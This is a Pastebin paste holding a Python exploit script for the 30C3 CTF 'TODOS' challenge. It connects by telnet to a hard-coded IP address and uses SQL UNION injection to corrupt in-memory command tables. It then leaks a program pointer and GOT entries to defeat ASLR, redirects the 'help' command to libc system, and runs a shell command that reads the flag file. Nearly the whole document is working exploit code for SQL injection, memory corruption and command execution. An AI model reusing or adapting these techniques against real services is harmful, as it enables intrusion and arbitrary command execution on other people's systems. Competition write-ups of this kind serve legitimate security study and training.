API tools faq
paste
Advertisement
Guest User

30C3 Todos Pwn Challenge Exploit

a guest
Dec 29th, 2013
146
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 5.28 KB | None | 0 0
raw download clone embed print report
  1. # 30C3 PWN Challenge TODOS Exploit
  2. # aXs^Big-Daddy - http://codezen.fr
  3.  
  4. import telnetlib
  5. import time
  6. from struct import pack, unpack
  7.  
  8. def show_to_val(tn, num):
  9.     tn.write("show "+str(num)+"\n")
  10.     raw_data = tn.read_until("\n")[len(str(num)+':')+1:].strip() + "\x00\x00"
  11.     return unpack('<Q', raw_data)[0]
  12.  
  13. HOST = '88.198.89.199'      # The remote host
  14. PORT = 1234
  15.  
  16. tn = telnetlib.Telnet(HOST, PORT)
  17.  
  18. print "[*] Login"
  19.  
  20. tn.read_until("If you're new, try help\n")
  21. tn.write("login aXs toto\n")
  22. tn.read_until("logged in...\n")
  23.  
  24. #time.sleep(3)
  25.  
  26. #.data:0000000000203B68 num_results     dd 0                    ; DATA XREF: do_show+10r
  27. #.data:0000000000203B68                                         ; do_search+A0w ...
  28. #.data:0000000000203B6C                 align 10h
  29. #.data:0000000000203B70 help_flag       dq 3                    ; DATA XREF: sub_14DE+60o
  30. #.data:0000000000203B70                                         ; display_help+23o
  31. #.data:0000000000203B78 ; char *ptr_commands
  32. #.data:0000000000203B78 ptr_commands    dq offset aHelp         ; DATA XREF: .text:000000000000144Br
  33. #.data:0000000000203B78                                         ; sub_14DE+4Ar ...
  34. #.data:0000000000203B78                                         ; "help"
  35. #.data:0000000000203B80                 dq offset aSomethingWentW+18h
  36. #.data:0000000000203B88                 dq offset display_help
  37. #.data:0000000000203B90                 dq offset aHelpPrintThisH ; "help: Print this help screen"
  38.  
  39. #0x7fc101a9cb68:    0x0f    0x00    0x00    0x00    0x00    0x00    0x00    0x00 num_results
  40. #0x7fc101a9cb70:    0x03    0x00    0x00    0x00    0x00    0x00    0x00    0x00 help_flags
  41. #0x7fc101a9cb78:    0xdc    0xb1    0x89    0x01    0xc1    0x7f    0x00    0x00 offset aHelp
  42. #0x7fc101a9cb80:    0x62    0xb1    0x89    0x01    0xc1    0x7f    0x00    0x00 offset aSomethingWentW
  43. #0x7fc101a9cb88:    0xa0    0xa7    0x89    0x01    0xc1    0x7f    0x00    0x00 offset display_help
  44.  
  45. print "\n[*] Prepare for infoleak with SQLi"
  46.  
  47. query = "search 9'"+ " UNION ALL SELECT 'A'"*10 + " UNION ALL SELECT concat(0x0e00000000000000,0x0300000000000000) -- # \n"
  48.  
  49. tn.write(query)
  50. tn.read_until("\n")
  51.  
  52. print "\n[*] Infoleak login function pointer"
  53.  
  54. do_login = show_to_val(tn, 11)
  55. print "do_login=", hex(do_login)
  56.  
  57. print "\n[*] Calculate ELF base and pointers"
  58.  
  59. base = do_login - 0x19d0
  60. print "ELF base=", hex(base)
  61.  
  62. aHelp = base + 0x21dc # "help" string
  63. aHelp_hex = '0x%x' % unpack('<Q', pack('>Q', aHelp))[0]
  64. print "help string offset=", hex(aHelp)
  65.  
  66. aSomethingWentW = base + 0x214a # "Something went wrong", useless
  67. aSomethingWentW_hex = '0x%x' % unpack('<Q', pack('>Q', aSomethingWentW))[0]
  68. print "Something went wrong string offset=", hex(aSomethingWentW)
  69.  
  70. display_help = base + 0x17A0 # display_help function
  71. display_help_hex = '0x%x' % unpack('<Q', pack('>Q', display_help))[0]
  72. print "help function offset=", hex(display_help)
  73.  
  74. got_plt = base + 0x00203000
  75. print "GOT PLT base=", got_plt
  76.  
  77. off_read_plt = got_plt + 0x050
  78. print "read@plt base=", off_read_plt
  79.  
  80. print "\n[*] Infoleak read@plt"
  81.  
  82. # We replace the pointer to the help command to the offset we want to leak
  83.  
  84. help_txt = off_read_plt
  85. help_txt_hex = '0x%x' % unpack('<Q', pack('>Q', help_txt))[0]
  86. print "help_txt=", hex(help_txt)
  87.  
  88. query = "search 9'"+ " UNION ALL SELECT 'B'"*10 + " UNION ALL SELECT concat(0x0e00000000000000,0x0300000000000000,"+aHelp_hex+","+aSomethingWentW_hex+","+display_help_hex+","+help_txt_hex+") -- # \n"
  89.  
  90. tn.write(query)
  91. tn.read_until("\n")
  92.  
  93. s = tn.get_socket()
  94.  
  95. tn.write("help\n")
  96.  
  97. s.recv(len("Commands:\n"))
  98. raw = s.recv(6)
  99.  
  100. tn.read_until("\n")
  101. tn.read_until("\n")
  102.  
  103. read_plt = unpack('<Q', raw + (8-len(raw))*"\x00")[0]
  104. print "read_plt=", hex(read_plt)
  105.  
  106. print "\n[*] Infoleak setvbuf@plt"
  107.  
  108. off_setvbuf_plt = got_plt + 0x040
  109.  
  110. help_txt = off_setvbuf_plt
  111. help_txt_hex = '0x%x' % unpack('<Q', pack('>Q', help_txt))[0]
  112. print "help_txt=", hex(help_txt)
  113.  
  114. tn.read_until("\n")
  115. tn.read_until("\n")
  116.  
  117. query = "search 9'"+ " UNION ALL SELECT 'B'"*10 + " UNION ALL SELECT concat(0x0e00000000000000,0x0300000000000000,"+aHelp_hex+","+aSomethingWentW_hex+","+display_help_hex+","+help_txt_hex+") -- # \n"
  118.  
  119. tn.write(query)
  120. tn.read_until("\n")
  121.  
  122. s = tn.get_socket()
  123.  
  124. tn.write("help\n")
  125.  
  126. print "help=",repr(s.recv(len("Commands:\n")))
  127. raw = s.recv(6)
  128.  
  129. tn.read_until("\n")
  130. tn.read_until("\n")
  131.  
  132. setvbuf_plt = unpack('<Q', raw + (8-len(raw))*"\x00")[0]
  133. print "setvbuf_plt=", hex(setvbuf_plt)
  134.  
  135. print "\n[*] Calculate distance between read and setvbuf in LIBC to find libc version"
  136.  
  137. print "- Precise: 0x753e0L"
  138. print "- Raring: 0x7a3b0L"
  139. print "- Chall: 0x7b010L"
  140.  
  141. check_plt = read_plt - setvbuf_plt
  142. print "distance PLT=", hex(check_plt)
  143. # Precise
  144. #system_plt = read_plt - 0xa1240
  145. # Saucy
  146.  
  147. print "\n[*] Calculate system libc offset"
  148.  
  149. system_plt = read_plt - 0x716be0
  150. print "system libc=", hex(system_plt)
  151.  
  152. print "\n[*] Overwrite help command pointer to system"
  153.  
  154. display_help = system_plt
  155. display_help_hex = '0x%x' % unpack('<Q', pack('>Q', display_help))[0]
  156.  
  157. query = "search 9'"+ " UNION ALL SELECT 'B'"*10 + " UNION ALL SELECT concat(0x0e00000000000000,0x0300000000000000,"+aHelp_hex+","+aSomethingWentW_hex+","+display_help_hex+","+help_txt_hex+") -- # \n"
  158.  
  159. tn.write(query)
  160. tn.read_until("\n")
  161. tn.read_until("\n")
  162. tn.read_until("\n")
  163.  
  164. print "\n[*] PWN"
  165.  
  166. tn.write("help cat /home/user/flag\n")
  167.  
  168. print tn.read_until("\n")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!